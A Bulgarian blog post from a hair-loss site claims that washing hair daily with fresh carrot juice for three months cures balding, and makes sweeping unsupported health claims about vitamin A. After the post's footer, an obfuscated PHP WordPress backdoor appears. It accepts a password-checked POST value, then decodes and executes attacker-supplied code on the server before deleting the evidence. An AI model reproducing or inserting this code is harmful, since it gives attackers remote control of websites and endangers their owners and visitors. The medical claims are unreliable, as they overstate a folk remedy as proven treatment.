Косопад и вълшебната сила на морковите | Косопад

Целебната сила на морковите при косопад

Сок от моркови спасява от косопад

моркови и косопад

Морковите са полезни при косопад

Едно от най – мощните средства срещу косопад е прясно изстисканият сок от моркови. Силата на този кореноплоден зеленчук е известна от векове, а специално внимание върху свойствата му срещу оплешивяване обръща дори и Астрид Линдгрен, в свето знаменито произведение „Пипи Дългото Чорапче”.

Ако искате да постигнете максимален ефект в борбата с косопад, трябва ежедневно да измивате косата си с прясно изцеден сок от моркови в продължение на три месеца. Също така, съвсем не е лоша идея да приемате и вътрешно тези толкова богати на полезни вещества зеленчуци. Особено важно условие е в никакъв случай да не загрявате течността, защото по този начин ще разрушите полезните съставки.

Морковите съдържат в себе си огромни количества витамин А, който според специалистите е в състояние неколкократно да завиши защитните сили на организма не само срещу косопад, но и при всякакви други заболявания. Ако третирате редовно косата със сок от моркови, тя ще стане по – устойчива на бактериални заболявания, ще получи повече хранителни вещества и в крайна сметка ще заблести както никога досега.

„Съвременният човек доста често пренебрегва природните дарове и се оставя по течението. Съвсем доскоро морковите бяха любима храна на малки и големи, но модерните продукти изместиха естествените плодове и зеленчуци от менюто на хората. А те могат да бъдат много полезни не само при косопад, но и за цялостното състояние на организма”, твърди д-р Владимир Нефьодов от Института по хранене в Санкт Петербург.

kosopad

kosopad

01. май 2013 20:07:15 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}